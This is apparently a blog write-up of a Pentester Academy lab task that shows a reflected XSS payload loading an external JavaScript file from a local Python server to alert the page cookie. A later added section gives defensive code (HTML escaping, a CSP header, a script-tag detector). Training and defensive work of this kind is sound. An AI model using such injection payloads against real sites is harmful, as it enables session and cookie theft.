Javascript for Pentester Task 9

Hello Pentesters, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. In this task, we will learn how to load an external JavaScript file, so the script is not limited by the space available at the injection point. You can view solutions to the other tasks here.

Task 9: Include External JS  | Task Link

This task is very easy: we have to show an alert box containing the cookie, using code loaded from an external JavaScript file. This comes in handy when there is not much room for our script because of limitations applied on the server side of the page.

Solution:

Find the injection point first; in this case, the input field is vulnerable to XSS. Start with a short injection such as "<script>alert(0)</script>" and check whether it executes. If it does, go ahead and insert the external JavaScript at the injection point. For this attack, you have to start a simple HTTP server in Python.

python -m http.server        # for Python 3.x
python -m SimpleHTTPServer   # for Python 2.x

After that, write the JavaScript code and save it in the directory your simple HTTP server is running from. The code in the JavaScript file does not need to be wrapped in <script> tags.

alert(document.cookie);

Our actual injection will look like this:

<script src='http://localhost:8000/j.js'></script>

Here j.js is the name of our JavaScript file. Now copy and paste the code above into the input field of the target page.
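
Seen from the defender's side, a server-side length limit does not stop this injection, because the tag only has to point at a script hosted elsewhere. The block below is an added example, not code from the original post or from the Pentester Academy lab: it reflects the same field unescaped and then with output encoding, and checks which output still carries a live external script tag. The page template, function names and the CSP value are assumptions.

```javascript
// Added example: constructed renderer for a reflected input field.
// escapeHtml, renderVulnerable, renderHardened, externalScriptSources and
// CSP_HEADER are hypothetical names, not part of the lab.

// Encode the five characters that can break out of an HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the field is reflected verbatim, so an injected tag becomes markup.
function renderVulnerable(input) {
  return `<p>You searched for: ${input}</p>`;
}

// "After": the same field, encoded on output. The tag is displayed as text.
function renderHardened(input) {
  return `<p>You searched for: ${escapeHtml(input)}</p>`;
}

// Defence in depth, sent as the Content-Security-Policy response header:
// scripts may load only from the page's own origin and inline scripts are
// refused, so a <script src> pointing at another origin is not fetched.
const CSP_HEADER = "script-src 'self'; object-src 'none'; base-uri 'none'";

// Review helper: list the src value of every <script src=...> tag in rendered
// HTML. A regex is a heuristic here, not a full HTML parser.
function externalScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    // Exactly one of the three capture groups is set, depending on quoting.
    found.push(m.slice(1).find((g) => g !== undefined));
  }
  return found;
}

// The injection string from this post, used as test input.
const samplePayload = "<script src='http://localhost:8000/j.js'></script>";
console.log(externalScriptSources(renderVulnerable(samplePayload)));
console.log(externalScriptSources(renderHardened(samplePayload)));
```

Output encoding is the actual fix; the CSP header only limits the damage if an unencoded sink is missed somewhere.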

That’s all. Refer to this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided on the Pentester Academy website.
